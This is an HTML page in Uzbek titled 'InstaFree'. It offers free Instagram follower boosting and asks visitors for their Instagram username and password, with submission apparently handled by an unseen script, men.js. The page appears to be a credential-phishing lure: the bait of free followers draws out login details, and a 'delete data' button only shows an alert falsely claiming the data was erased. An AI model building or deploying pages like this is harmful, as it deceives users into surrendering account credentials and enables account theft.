<!DOCTYPE html>
<html>
<head>
	<title>InstaFree 🔴</title>
	<meta name="viewport" content="width=device-width, initial-scale=1.0">
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css">

	<style type="text/css">

		body {
			font-family: Helvetica;
		}

		.center-div-inline {
			text-align: center;
			margin-top: 60px;
		}

		.inline-div {
			display: inline-block;
			background-color: whitesmoke;
			width: 420px;
			border-radius: 11px;
			border: none;
			text-align: center;
			box-shadow: 10px 10px 10px rgba(0,0,0,0.2);
		}

		.h1-diving {
			background-color: red;
			color: white;
			width: 420px;
			height: 90px;
			margin-top: 0;
			border-radius: 11px;
			font-size: 30px;
		}

		label {
			font-size: 23px;
		}

		input {
			width: 250px;
			height: 35px;
			font-size: 16px;
		}

		.btn-kirish {
			background-color: green;
			color: white;
			border-radius: 9px;
			border: none;
			width: 200px;
			height: 30px;
			font-size: 17px;
			cursor: pointer;
		}

		.btn-kirish:hover {
			transform: scale(0.9);
		}

		.btn-free {
			background-color: whitesmoke;
			color: red;
			border: none;
			font-size: 30px;
			margin-top: 0;
		}

		.btn-com {
			background-color: red;
			color: white;
			width: 150px;
			height: 26px;
			border-radius: 8px;
			border: none;
			margin: 6px;
		}

		.btn-com:hover {
			transform: scale(0.9);
		}

		@media(max-width: 480px) {
			.center-div-inline {
				text-align: center;
				margin-top: 0;
			}
			.inline-div {
				display: inline-block;
				background-color: whitesmoke;
				width: 250px;
				border-radius: 11px;
				border: none;
				text-align: center;
				box-shadow: 10px 10px 10px rgba(0,0,0,0.2);
			}
			.h1-diving {
				background-color: red;
				color: white;
				width: 250px;
				height: 80px;
				margin-top: 0;
				border-radius: 11px;
				font-size: 20px;
			}
			label {
				font-size: 15px;
			}

			input {
				width: 200px;
				height: 30px;
				font-size: 13px;
			}

			.btn-kirish {
				background-color: green;
				color: white;
				border-radius: 9px;
				border: none;
				width: 150px;
				height: 25px;
				font-size: 14px;
				cursor: pointer;
			}

			.btn-kirish:hover {
				transform: scale(1.1);
			}

			.btn-com {
				background-color: red;
				color: white;
				width: 130px;
				height: 20px;
				border-radius: 8px;
				border: none;
				margin: 6px;
				font-size: 11px;
			}

			.btn-com:hover {
				transform: scale(0.9);
			}
		}

	</style>

</head>
<body>

	<div class="center-div-inline">
		<div class="inline-div">

			<h1 class="h1-diving">Instagram profilga <span style="color: green;">nakrutka</span> berish, <span style="color: green;">ishonchli va sodda!</span> </h1>

			<a>
				<button class="btn-free">
					<i class="fab fa-instagram"></i>
					InstaFree
				</button><br><br>
			</a>

			<form id="contactForm">
				<label>Foydalnuvchi ism:</label><br>
				<input type="text" name="ism" id="name" placeholder="username" required><br><br>

				<label>Parol:</label><br>
				<input type="password" name="parol" id="pess" placeholder="password" required><br><br>

				<button type="submit" class="btn-kirish">Tasdiqlash ✔</button><br>
				<button onclick="alert('Barcha ma`lumot o`chirildi ✔')" class="btn-com"> Ma'lumotlarni o'chirish</button>
				<hr>
				<p>Nakrutka berish bepul... 😊</p>
			</form>

			<script src="men.js" type="text/javascript"></script>

		</div>
	</div>

</body>
</html>
